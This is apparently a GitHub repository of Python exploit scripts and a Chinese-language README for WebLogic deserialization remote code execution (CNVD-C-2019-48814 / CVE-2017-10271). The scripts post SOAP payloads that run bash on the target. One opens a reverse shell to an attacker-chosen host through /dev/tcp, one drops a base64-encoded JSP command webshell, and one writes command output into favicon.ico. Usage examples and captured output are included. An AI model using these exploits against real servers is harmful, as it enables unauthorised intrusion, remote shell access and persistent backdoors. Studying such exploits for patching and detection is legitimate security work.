├── push.sh
├── command.jpg
├── python.jpg
├── burpsuite.jpg
├── webshell.jpg
├── reserve_shell.jpg
├── CNVD-C-2019-48814.mp4
├── windows-linux-webshell.jpg
├── cve-2017-10271
├── readme.md
├── async_reserve_shell.py
├── async_command_favicon.py
├── async_webshell-all.py
└── async_webshell.py
└── README.md
/push.sh:
--------------------------------------------------------------------------------
1 | git add *
2 | git commit -m "update"
3 | git push -u origin
4 |
--------------------------------------------------------------------------------
/command.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/command.jpg
--------------------------------------------------------------------------------
/python.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/python.jpg
--------------------------------------------------------------------------------
/burpsuite.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/burpsuite.jpg
--------------------------------------------------------------------------------
/webshell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/webshell.jpg
--------------------------------------------------------------------------------
/reserve_shell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/reserve_shell.jpg
--------------------------------------------------------------------------------
/CNVD-C-2019-48814.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/CNVD-C-2019-48814.mp4
--------------------------------------------------------------------------------
/windows-linux-webshell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/windows-linux-webshell.jpg
--------------------------------------------------------------------------------
/cve-2017-10271/readme.md:
--------------------------------------------------------------------------------
1 | ### just for No Pactch For CVE-2017-10271
2 | ### _async/AsyncResponseService RCE
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CNVD-C-2019-48814
2 | WebLogic wls9-async反序列化远程命令执行漏洞
3 |
4 | ### 回显poc for weblogic
5 | 
6 | 
7 |
8 | ### Patch update:
9 | ```
10 |
11 | https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
12 |
13 | ```
14 | ### 漏洞复现:
15 |
16 |
17 | ```
18 | http://10.10.20.166:7001/_async/AsyncResponseService
19 | ```
20 |
21 | ```
22 | curl -i http://10.10.20.166:7001/_async/favicon.ico
23 | ```
24 | ## CNVD-C-2019-48814 Video
25 |
26 | [](https://github.com/jas502n/CNVD-C-2019-48814/blob/master/CNVD-C-2019-48814.mp4)
27 |
28 | ```
29 | python CNVD-C-2019-48814.py -u http://10.10.20.166:7001 -p 1.txt
30 |
31 | >>>>Common See:
32 |
33 | write website favicon.ico
34 | Don't Need RMI Server
35 |
36 | http://10.10.20.166:7001/_async/favicon.ico
37 |
38 | >>>>Request Success!
39 | status_code:202
40 |
41 | C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
42 | HTTP/1.1 200 OK
43 | Date: Thu, 25 Apr 2019 14:37:49 GMT
44 | Accept-Ranges: bytes
45 | Content-Length: 5
46 | Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
47 | X-Powered-By: Servlet/2.5 JSP/2.1
48 |
49 | root
50 |
51 | ```
52 | ## Use RMI
53 | 
54 |
55 | 
56 |
57 | ### CVE-2017-10271 No pactch
58 |
59 | #### windows-linux-webshell
60 | ```
61 | upadte: 自定义webshell名字,适用于windows or linux upload webshell
62 |
63 | python async_webshell-all.py http://10.10.20.166:7001/ webshell.jsp
64 | >>>Webshell:
65 | http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami
66 | ```
67 | 
68 |
69 |
70 | #### resever_shell
71 | 
72 | #### command see
73 | 
74 | #### webshell
75 | 
76 |
77 |
--------------------------------------------------------------------------------
/cve-2017-10271/async_reserve_shell.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | #author: jas502n
3 | import sys
4 | import requests
5 |
6 | url = sys.argv[1]
7 | # "http://10.10.20.166:7001/_async/AsyncResponseService"
8 | ip = sys.argv[2]
9 | port = sys.argv[3]
10 |
11 | print '''
12 | ____
13 | | _ \
14 | | |_) |_ _ _ __ __ _ ___ ___
15 | | _ <| | | | '_ \ / _` / __/ __|
16 | | |_) | |_| | |_) | (_| \__ \__ \
17 | |____/ \__, | .__/ \__,_|___/___/
18 | __/ | |
19 | |___/|_| By jas502n
20 |
21 | No Pactch For CVE-2017-10271
22 |
23 | _async/AsyncResponseService RCE
24 |
25 | '''
26 |
27 | print ">>>> usage: python test.py url reserve_ip reserve_port \n"
28 | payload = " xxxx\r\n \r\n \r\n \r\n /bin/bash\r\n \r\n \r\n -c\r\n \r\n \r\n bash -i >& /dev/tcp/%s/%s 0>&1\r\n \r\n \r\n \r\n \r\n" % (ip,port)
29 | headers = {
30 | 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
31 | 'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
32 | 'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
33 | 'Accept-Encoding': "gzip, deflate",
34 | 'X-Forwarded-For': "127.0.0.2",
35 | 'Connection': "close",
36 | 'Upgrade-Insecure-Requests': "1",
37 | 'Content-Type': "text/xml",
38 | 'Content-Length': "963",
39 | 'cache-control': "no-cache"
40 | }
41 |
42 | response = requests.request("POST", url, data=payload, headers=headers)
43 |
44 |
45 | print "status_code:%s" % str(response.status_code)
46 | print(response.text)
47 |
--------------------------------------------------------------------------------
/cve-2017-10271/async_command_favicon.py:
--------------------------------------------------------------------------------
1 | #author: jas502n
2 | import requests
3 | import sys
4 |
5 | # url = "http://10.10.20.166:7001/_async/AsyncResponseService"
6 |
7 |
8 | print '''
9 | _____ _____ ______
10 | | __ \ / ____| ____|
11 | __ _ ___ _ _ _ __ ___ | |__) | | | |__
12 | / _` / __| | | | '_ \ / __| | _ /| | | __|
13 | | (_| \__ \ |_| | | | | (__ | | \ \| |____| |____
14 | \__,_|___/\__, |_| |_|\___| |_| \_\\_____|______|
15 | __/ |
16 | |___/ By jas502n
17 |
18 | No patch for cve-2017-10271
19 |
20 | _async/AsyncResponseService RCE
21 | '''
22 |
23 |
24 | url = sys.argv[1]
25 | vuln_dir ="/_async/AsyncResponseService"
26 |
27 | vuln_url = url + vuln_dir
28 | print "\n>>>>The Vuln Url: %s \n" % vuln_url
29 | cmd = sys.argv[2]
30 | favicon_ico = "servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/favicon.ico"
31 | payload = " xxxx\r\n \r\n \r\n \r\n /bin/bash\r\n \r\n \r\n -c\r\n \r\n \r\n %s > %s\r\n \r\n \r\n \r\n \r\n" % (cmd,favicon_ico)
32 |
33 | proxies = {
34 | "http":"http://127.0.0.1:8080"
35 | }
36 |
37 | headers = {
38 | 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
39 | 'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
40 | 'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
41 | 'Accept-Encoding': "gzip, deflate",
42 | 'Cookie': "sidebar_collapsed=false",
43 | 'X-Forwarded-For': "127.0.0.2",
44 | 'Connection': "close",
45 | 'Upgrade-Insecure-Requests': "1",
46 | 'Content-Type': "text/xml",
47 | 'Content-Length': "1001",
48 | 'cache-control': "no-cache"
49 | }
50 |
51 | response = requests.request("POST", vuln_url, data=payload, headers=headers)
52 |
53 |
54 | print("%s/_async/favicon.ico") % url
55 | print(response.text)
56 |
--------------------------------------------------------------------------------
/cve-2017-10271/async_webshell-all.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | # url = "http://10.10.20.166:7001/_async/AsyncResponseService"
4 |
5 | url = sys.argv[1]
6 | url_dir = "/_async/AsyncResponseService"
7 | vuln_url = url + url_dir
8 | print vuln_url
9 | print '''
10 | _ _ _ _
11 | | | | | | | |
12 | __ _____| |__ ___| |__ ___| | |
13 | \ \ /\ / / _ \ '_ \/ __| '_ \ / _ \ | |
14 | \ V V / __/ |_) \__ \ | | | __/ | |
15 | \_/\_/ \___|_.__/|___/_| |_|\___|_|_|
16 |
17 | By jas502n
18 |
19 | No Pactch For CVE-2017-10271
20 |
21 | _async/AsyncResponseService RCE
22 |
23 | webshell for linux windows
24 | '''
25 |
26 | write_dir="servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/"
27 | shell_name=sys.argv[2]
28 | shell_dir = write_dir + shell_name
29 | print "shell_dir= %s" % shell_dir
30 | proxies = {"http": "http://127.0.0.1:8080"}
31 | payload = '''
32 |
33 | xxxx
34 |
50 | ''' % shell_dir
51 | # print payload
52 | headers = {
53 | 'Accept-Encoding': "gzip, deflate",
54 | 'SOAPAction': "",
55 | 'Accept': "*/*",
56 | 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
57 | 'Connection': "keep-alive",
58 | 'content-type': "text/xml",
59 | 'Content-Length': "1139",
60 | 'Cache-Control': "no-cache",
61 | 'cache-control': "no-cache"
62 | }
63 |
64 |
65 |
66 | response = requests.request("POST", vuln_url, data=payload, headers=headers,proxies=proxies)
67 | print "\n\nWebshell: \n"
68 | print url + "/bea_wls_internal/" + shell_name + "?pwd=123&cmd=whoami"
69 | print(response.text)
70 |
--------------------------------------------------------------------------------
/cve-2017-10271/async_webshell.py:
--------------------------------------------------------------------------------
1 | #author: jas502n
2 | import requests
3 | import sys
4 | # url = "http://10.10.20.166:7001/_async/AsyncResponseService"
5 |
6 | url = sys.argv[1]
7 | url_dir = "/_async/AsyncResponseService"
8 | vuln_url = url + url_dir
9 | print '''
10 | _ _ _ _
11 | | | | | | | |
12 | __ _____| |__ ___| |__ ___| | |
13 | \ \ /\ / / _ \ '_ \/ __| '_ \ / _ \ | |
14 | \ V V / __/ |_) \__ \ | | | __/ | |
15 | \_/\_/ \___|_.__/|___/_| |_|\___|_|_|
16 |
17 | By jas502n
18 |
19 | No Pactch For CVE-2017-10271
20 |
21 | _async/AsyncResponseService RCE
22 | '''
23 | print "\n>>>>Usage: python webshell.py url webshell.jsp\n"
24 | print ">>>The Vuln Url: %s" % vuln_url
25 | print
26 | webshell_name = sys.argv[2]
27 | webshell_dir = "servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/"
28 | payload = " xxxx\r\n \r\n \r\n \r\n /bin/bash\r\n \r\n \r\n -c\r\n \r\n \r\n echo IDwlQCBwYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YS5pby4qIiU+CjwlCiU+CjxIVE1MPjxCT0RZPgpDb21tYW5kcyB3aXRoIEpTUAo8Rk9STSBNRVRIT0Q9IkdFVCIgTkFNRT0ibXlmb3JtIiBBQ1RJT049IiI+CjxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZCI+CjwvRk9STT4KPHByZT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7CiAgICBvdXQucHJpbnRsbigiQ29tbWFuZDogIiArIHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7CiAgICBQcm9jZXNzIHA7CiAgICBpZiAoIFN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLnRvTG93ZXJDYXNlKCkuaW5kZXhPZigid2luZG93cyIpICE9IC0xKXsKICAgICAgICBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIGVsc2V7CiAgICAgICAgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgIG91dC5wcmludGxuKGRpc3IpOwogICAgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgfQp9CiU+CjwvcHJlPgo8L0JPRFk+PC9IVE1MPiAKCg== |base64 -d > %s%s\r\n \r\n \r\n \r\n \r\n" % (webshell_dir,webshell_name)
29 | headers = {
30 | 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
31 | 'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
32 | 'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
33 | 'Accept-Encoding': "gzip, deflate",
34 | 'Connection': "close",
35 | 'Content-Type': "text/xml",
36 | 'Content-Length': "2163",
37 | 'cache-control': "no-cache"
38 | }
39 |
40 | response = requests.request("POST", vuln_url, data=payload, headers=headers)
41 | print "\n\nWebshell: \n"
42 | print url + "/bea_wls_internal/" + webshell_name + "?cmd=whoami"
43 |
44 | print(response.text)
45 |
--------------------------------------------------------------------------------